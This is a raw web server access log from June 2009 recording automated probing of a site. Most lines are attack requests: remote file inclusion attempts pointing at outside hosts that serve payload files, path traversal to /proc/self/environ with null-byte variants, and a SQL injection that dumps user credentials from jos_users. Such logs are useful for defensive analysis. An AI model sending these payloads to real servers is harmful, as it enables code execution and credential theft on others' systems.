77.221.130.2 - - [06/Jun/2009:05:28:46 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:28:46 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
77.221.130.2 - - [06/Jun/2009:05:28:47 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 283 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:28:47 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 283 "-" "XXXXXX"
211.172.225.50 - - [06/Jun/2009:05:28:58 -0400] "GET /logs/access_log.Q109052400//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:58 -0400] "GET /logs/access_log.Q109052400//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:28:58 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:05:29:01 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:05:29:25 -0400] "GET //brim/index.php?plugin=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:05:29:25 -0400] "GET /logs/access_log.Q109052500//brim/index.php?plugin=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:05:29:25 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:29:26 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:29:26 -0400] "GET /logs/access_log.Q109052500//brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:29:26 -0400] "GET //brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:29:26 -0400] "GET /logs/access_log.Q109052500//brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:29:26 -0400] "GET //brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:29:29 -0400] "GET /logs//brim/index.php?plugin=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 218 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:05:29:30 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:29:30 -0400] "GET /logs//brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 218 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:29:30 -0400] "GET /logs//brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 218 "-" "XXXXXX"
217.169.210.130 - - [06/Jun/2009:05:29:39 -0400] "GET /logs/error_log.Q109050900/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
77.221.130.2 - - [06/Jun/2009:05:29:42 -0400] "GET /logs/access_log.Q109053000//brim/index.php?plugin=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:29:42 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
77.221.130.2 - - [06/Jun/2009:05:29:42 -0400] "GET /logs/access_log.Q109053000//brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:29:43 -0400] "GET /logs/access_log.Q109053000//brim/index.php?plugin=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
116.36.213.166 - - [06/Jun/2009:05:29:45 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
41.250.251.52 - - [06/Jun/2009:05:31:17 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
212.150.52.114 - - [06/Jun/2009:05:31:25 -0400] "GET /logs/error_log.Q109022100//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:05:31:25 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:05:31:26 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
41.250.251.52 - - [06/Jun/2009:05:31:26 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
121.165.73.157 - - [06/Jun/2009:05:31:28 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:05:31:28 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:05:31:28 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
41.250.251.52 - - [06/Jun/2009:05:31:31 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
41.250.251.52 - - [06/Jun/2009:05:31:31 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
119.93.90.155 - - [06/Jun/2009:05:31:42 -0400] "GET /logs/access_log.Q109052500/components/com_simpleboard/image_upload.php?sbp=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:05:31:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
41.250.251.52 - - [06/Jun/2009:05:32:45 -0400] "GET /logs/access_log.Q109052300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
67.15.48.60 - - [06/Jun/2009:05:33:13 -0400] "GET /logs/access_log.Q109052300//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:33:13 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:33:13 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:33:14 -0400] "GET /logs/access_log.Q109050700//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.810"
66.194.152.139 - - [06/Jun/2009:05:33:23 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://hecaru.by.ru/id/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.76"
66.194.152.139 - - [06/Jun/2009:05:33:24 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://hecaru.by.ru/id/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
66.194.152.139 - - [06/Jun/2009:05:33:24 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://hecaru.by.ru/id/id.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.76"
218.1.64.133 - - [06/Jun/2009:05:33:52 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.1.64.133 - - [06/Jun/2009:05:33:53 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:05:33:56 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 283 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:05:34:01 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 283 "-" "XXXXXX"
121.165.73.157 - - [06/Jun/2009:05:34:17 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:05:34:53 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.1.64.133 - - [06/Jun/2009:05:34:53 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.1.64.133 - - [06/Jun/2009:05:34:54 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:05:34:54 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:05:34:57 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:05:34:57 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 256 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:05:34:57 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
190.144.44.36 - - [06/Jun/2009:05:34:58 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:05:35:00 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 256 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:05:35:08 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.1.64.133 - - [06/Jun/2009:05:35:09 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:05:35:09 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 283 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:05:35:10 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 283 "-" "XXXXXX"
94.23.200.54 - - [06/Jun/2009:05:35:28 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:35:28 -0400] "GET /logs/access_log.Q109052300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:35:39 -0400] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:35:39 -0400] "GET /logs/access_log.Q109052900//OLE.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:35:39 -0400] "GET //OLE.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:05:36:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.85.142 - - [06/Jun/2009:05:37:22 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
87.230.85.142 - - [06/Jun/2009:05:37:22 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
87.230.85.142 - - [06/Jun/2009:05:37:22 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
87.230.85.142 - - [06/Jun/2009:05:37:24 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
87.230.85.142 - - [06/Jun/2009:05:37:24 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
87.230.85.142 - - [06/Jun/2009:05:37:24 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
125.131.116.12 - - [06/Jun/2009:05:37:32 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:37:32 -0400] "GET /logs/access_log.Q109051800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:05:37:57 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
87.230.85.142 - - [06/Jun/2009:05:38:24 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
190.144.44.36 - - [06/Jun/2009:05:38:27 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.230.85.142 - - [06/Jun/2009:05:38:27 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.150.52.114 - - [06/Jun/2009:05:38:36 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
218.149.85.37 - - [06/Jun/2009:05:40:50 -0400] "GET /playing.php?commonpath=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:05:40:50 -0400] "GET /logs/playing.php?commonpath=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:05:40:50 -0400] "GET /logs/access_log.Q109053100%20%20/playing.php?commonpath=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:05:40:56 -0400] "GET /logs/access_log.Q109052600%20%20/playing.php?commonpath=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.14 - - [06/Jun/2009:05:40:58 -0400] "GET /logs/error_log.Q108021700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [06/Jun/2009:05:41:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [06/Jun/2009:05:42:00 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:42:34 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:42:43 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:43:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:43:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:44:03 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:44:09 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:44:19 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:44:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
222.255.37.201 - - [06/Jun/2009:05:44:29 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
78.24.219.48 - - [06/Jun/2009:05:44:39 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:44:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
64.182.124.1 - - [06/Jun/2009:05:44:43 -0400] "GET //?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 200 452 "-" "Mozilla/5.0"
64.182.124.1 - - [06/Jun/2009:05:44:43 -0400] "GET /logs/access_log.Q109051700//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
64.182.124.1 - - [06/Jun/2009:05:44:43 -0400] "GET /logs//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 200 4371 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:45:34 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.111.80.18 - - [06/Jun/2009:05:45:34 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:05:45:34 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:05:45:34 -0400] "GET /logs/error_log.Q109011700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:05:45:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:46:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
64.182.124.1 - - [06/Jun/2009:05:46:27 -0400] "GET /logs/access_log.Q109051700%20%20//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:05:46:34 -0400] "GET /logs/access_log.Q109053100/playing.php?commonpath=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:05:46:35 -0400] "GET /logs/access_log.Q109052600/playing.php?commonpath=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:05:46:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:05:46:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
